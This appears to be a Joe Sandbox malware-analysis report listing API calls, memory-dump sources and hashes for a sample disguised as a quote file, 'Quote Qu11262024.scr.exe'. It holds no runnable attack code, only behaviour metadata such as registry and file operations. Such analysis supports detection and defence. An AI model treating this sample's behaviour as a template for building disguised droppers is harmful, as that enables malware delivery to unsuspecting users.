                                                                                                    • Instruction Fuzzy Hash: CC510170D04269CBDF248FA8C858BADBBB0FF00305F15846ED456B7281D7799A96DF05
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00403175
                                                                                                      • Part of subcall function 004032E0: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FDE,?), ref: 004032EE
                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040308B,00000004,00000000,00000000,?,?,00403005,000000FF,00000000,00000000,0040A130,?), ref: 004031A8
                                                                                                    • SetFilePointer.KERNELBASE(00004FA8,00000000,00000000,004138D8,00004000,?,00000000,0040308B,00000004,00000000,00000000,?,?,00403005,000000FF,00000000), ref: 004032A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer$CountTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 1092082344-0
                                                                                                    • Opcode ID: 143db730cc74336c53d5d9a7555e55f5fc027f35c095160eb067d46a4556356d
                                                                                                    • Instruction ID: 6ea017373dad3d81dd07948e620bde7ba358540d2f388bcac06cddd74518511b
                                                                                                    • Opcode Fuzzy Hash: 143db730cc74336c53d5d9a7555e55f5fc027f35c095160eb067d46a4556356d
                                                                                                    • Instruction Fuzzy Hash: 93313C72A042059BD710FF6AFE889667BECE745356714827FE900B22F0CB389941DB9D
                                                                                                    APIs
                                                                                                    • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402517
                                                                                                    • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040252A
                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,00000000,00000011,00000002), ref: 00402542
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Enum$CloseValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 397863658-0
                                                                                                    • Opcode ID: 00a1bacc488d2263d9516a048e35f26cb3836fb7a7dddbd39cfe04bebab4c402
                                                                                                    • Instruction ID: 81a355341f4b85fa93c1fce666a77c42a7fd7dbc629347c424556e4932e00d72
                                                                                                    • Opcode Fuzzy Hash: 00a1bacc488d2263d9516a048e35f26cb3836fb7a7dddbd39cfe04bebab4c402
                                                                                                    • Instruction Fuzzy Hash: AF0171B1A04205BFEB159FA5DE9CABF7AACDF80348F10443EF145A61C0DAB84A459729
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000000), ref: 738E2A7F
                                                                                                    • GetLastError.KERNEL32 ref: 738E2B86
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2348832635.00000000738E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 738E0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2348743779.00000000738E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348882252.00000000738E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348981073.00000000738E5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 723a650f0f0bf83d3fe277ae472267fe3ca274ce69657f0242595c9e6f9f834a
                                                                                                    • Instruction ID: 72227e54c188c13f89efee256f100cd8a43fd10777f411249320994b76e926eb
                                                                                                    • Opcode Fuzzy Hash: 723a650f0f0bf83d3fe277ae472267fe3ca274ce69657f0242595c9e6f9f834a
                                                                                                    • Instruction Fuzzy Hash: 1751697298471CDFEB61FFEAD881B5937B6EB46326F28943DD80D87240D63894418BA0
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403005,000000FF,00000000,00000000,0040A130,?), ref: 0040307E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 3846ef266cf2e2f5dfd90f7eefd76d6949df0af92e4b69d2375025351fe1386d
                                                                                                    • Instruction ID: 615504866431daf78613963d2445acb97fd0d3cdf8cea74ab6fc8a122f90d5e9
                                                                                                    • Opcode Fuzzy Hash: 3846ef266cf2e2f5dfd90f7eefd76d6949df0af92e4b69d2375025351fe1386d
                                                                                                    • Instruction Fuzzy Hash: C9314F30604219FFDB10AF95ED44A9A3FA8EB08755F10843AF915FA2D0D338DA50DBA9
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,00000000,00000011,00000002), ref: 00402542
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseQueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3356406503-0
                                                                                                    • Opcode ID: fbdcf63b027d784d57a0bb3c1569a41ba5ce61e902001335e18cf8d4000cc021
                                                                                                    • Instruction ID: 36059fc9ea0cc80fea11683a4bdffd3f2594872da75a3914d341b8b3144e955c
                                                                                                    • Opcode Fuzzy Hash: fbdcf63b027d784d57a0bb3c1569a41ba5ce61e902001335e18cf8d4000cc021
                                                                                                    • Instruction Fuzzy Hash: 4F11E371A01205EEDB15CF64DA989AEBBB4DF00348F20843FE446B72C0D6B84A81DB29
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
                                                                                                    • Instruction ID: 0b9a08df0e19283e0c47f542131d218e25c17bbe1cc26e2bbd3e30b70dde81e4
                                                                                                    • Opcode Fuzzy Hash: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
                                                                                                    • Instruction Fuzzy Hash: FD01F431B202109BE7194B389D05B6A36A8E710315F51823FF951F65F1D778CC038B4C
                                                                                                    APIs
                                                                                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004023A2
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004023AB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseDeleteValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 2831762973-0
                                                                                                    • Opcode ID: 7736ea771eb21fcdca5ca7ba6c43a5f9957d5195e87ec1ed73cf4194145d2cca
                                                                                                    • Instruction ID: e2b28eba542ac709277d4f810ee3eebdcc57cef5ce899b040ed27ab94443e20d
                                                                                                    • Opcode Fuzzy Hash: 7736ea771eb21fcdca5ca7ba6c43a5f9957d5195e87ec1ed73cf4194145d2cca
                                                                                                    • Instruction Fuzzy Hash: 6BF09C32B005119BD711ABE49B8EABE76A49B80314F25043FE602B71C1DAFC4D02876D
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401E49
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401E54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1136574915-0
                                                                                                    • Opcode ID: 183f5197632a13c997e4243aff4dbdd5fb77fad2421714589432816430500f1f
                                                                                                    • Instruction ID: cf104d59a24c1cf252c7b1e000f572f08c5f48dea737d8bfb2b4f1dde6d638d0
                                                                                                    • Opcode Fuzzy Hash: 183f5197632a13c997e4243aff4dbdd5fb77fad2421714589432816430500f1f
                                                                                                    • Instruction Fuzzy Hash: C5E06D72B042029FDB14ABA5EA485AEB6A0EF40319B10403BE011B10D1DA7848419F5C
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(0001044E), ref: 00401581
                                                                                                    • ShowWindow.USER32(00010448), ref: 00401596
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268545403-0
                                                                                                    • Opcode ID: 282e38d7ca16112b61974c9c6cc93705b54a845b5386b3053725f2082dc7e54d
                                                                                                    • Instruction ID: 6f79b5eb7c4d5eca99ff2561f392518dee343acededb6aefd8b1b10e0f6f552e
                                                                                                    • Opcode Fuzzy Hash: 282e38d7ca16112b61974c9c6cc93705b54a845b5386b3053725f2082dc7e54d
                                                                                                    • Instruction Fuzzy Hash: 14E08672B001119BCB24DFA8ED90C7EB7B5EB84311751053FD502B3690C6B89D418B58
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,0040339B,0000000A), ref: 0040647E
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406499
                                                                                                      • Part of subcall function 004063FE: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406415
                                                                                                      • Part of subcall function 004063FE: wsprintfA.USER32 ref: 0040644E
                                                                                                      • Part of subcall function 004063FE: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406462
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2547128583-0
                                                                                                    • Opcode ID: 1c47c688bcf69069a527ab0148f0c5260ccbe018ae87fb6a1afc4b3380ba255e
                                                                                                    • Instruction ID: 19e23648a982eb50ebdacd00ec923428f084d9cc41de21ab2c77af9af510e16e
                                                                                                    • Opcode Fuzzy Hash: 1c47c688bcf69069a527ab0148f0c5260ccbe018ae87fb6a1afc4b3380ba255e
                                                                                                    • Instruction Fuzzy Hash: A1E086326042107AD6116B709E0482763A89FC4750702843EF946F2150EB3C9C32A6AD
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402DF6,C:\Users\user\Desktop\Quote Qu11262024.scr.exe,80000000,00000003), ref: 00405C71
                                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCreate
                                                                                                    • String ID:
                                                                                                    • API String ID: 415043291-0
                                                                                                    • Opcode ID: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                                                                    • Instruction ID: 44ec1511c7d75563636feacf23b0872b92cf9f9cc06fc18b7ec6e669f43cef59
                                                                                                    • Opcode Fuzzy Hash: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                                                                    • Instruction Fuzzy Hash: E4D09E71654201AFEF098F20DE16F2EBAA2EB84B00F11952CB682944E1DA715819AB19
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,0040331B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040353A,?,00000006,00000008,0000000A), ref: 00405744
                                                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405752
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1375471231-0
                                                                                                    • Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                                                    • Instruction ID: d90611423be4a620932cd206d9d2e425f1dfb1f05dfa7664ba9223c81c0889e2
                                                                                                    • Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                                                    • Instruction Fuzzy Hash: CFC04C30215901DBDA506F209F08B177994AB60741F2148396146E20E0DA749415E92E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2111968516-0
                                                                                                    • Opcode ID: 1bb28ed7f414ed38adafb862a49d478baefa45c14bb6d4383c08a1e27384216e
                                                                                                    • Instruction ID: be400bbae767a8f652b0f7fa1be9ea109bd3485c354cf92d74559c0423e952a1
                                                                                                    • Opcode Fuzzy Hash: 1bb28ed7f414ed38adafb862a49d478baefa45c14bb6d4383c08a1e27384216e
                                                                                                    • Instruction Fuzzy Hash: EB210E70D04295BADF318FA99648BAEBF749F11304F04457FE491B62D1C2BD8A81CF19
                                                                                                    APIs
                                                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileMove
                                                                                                    • String ID:
                                                                                                    • API String ID: 3562171763-0
                                                                                                    • Opcode ID: cf1e45ae702daa4f62270806a0abd7d14199c2501cc4e861e2645e0893e76f5a
                                                                                                    • Instruction ID: 3afd90a886a66e760400c5cc359a7331a28fc39f52e754074930d618b72257bd
                                                                                                    • Opcode Fuzzy Hash: cf1e45ae702daa4f62270806a0abd7d14199c2501cc4e861e2645e0893e76f5a
                                                                                                    • Instruction Fuzzy Hash: 88F09031704121A3CB20B7A59F4ED9F65A49F8232CB240A3FF111B21D1DABD8602867F
                                                                                                    APIs
                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402335
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
